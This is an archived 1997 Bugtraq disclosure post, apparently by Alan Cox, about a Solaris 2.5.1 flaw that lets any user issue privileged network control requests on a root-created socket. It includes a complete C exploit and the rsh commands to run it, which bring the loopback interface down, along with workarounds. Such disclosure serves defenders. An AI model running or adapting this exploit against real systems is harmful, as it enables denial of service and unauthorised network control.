Bugtraq mailing list archives

Solaris 2.5.1 party piece
From: alan () LXORGUK UKUU ORG UK (Alan Cox)
Date: Thu, 19 Jun 1997 15:27:39 +0100


 Well CERT have had this for a year, AUSCERT for a couple of weeks and
now it's time bugtraq had it

cc solarisuck.c -o solarisuck -lsocket
rsh localhost ./solarisuck


 solarisuck.c

#include <stdio.h>
#include <string.h>       /* strcpy */
#include <unistd.h>       /* ioctl prototype on Solaris */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/sockio.h>   /* SIOCSIFFLAGS on Solaris */
#include <net/if.h>       /* struct ifreq */
#include <netinet/in.h>


int main(int argc, char *argv[])
{
        struct ifreq please_break_me;

        /* Target the loopback interface and clear every flag on it,
         * i.e. bring lo0 down. */
        strcpy( please_break_me.ifr_name, "lo0");
        please_break_me.ifr_flags=0;

        /* When started by rshd, fd 0 is the socket that root-owned
         * rshd created, so this privileged ioctl is accepted for an
         * unprivileged user. */
        if(ioctl(0, SIOCSIFFLAGS, &please_break_me)==-1)
                perror("Damn it didn't work. Obviously not Solaris ;)");
        return 0;
}


You can adjust this to do other things. Basically any user can do network control
requests on a root-created socket descriptor.


Workarounds:
 1.  Disable rsh and any non-root-owned inetd tasks -  breaks remote tar etc.
 2.  Run an OS that the vendor doesn't take a year to fix bugs in

 I have the original emails from Sun folks (Casper Dik, Alec Muffett and co)
 to prove Sun have sat on this for ages.

 Alan


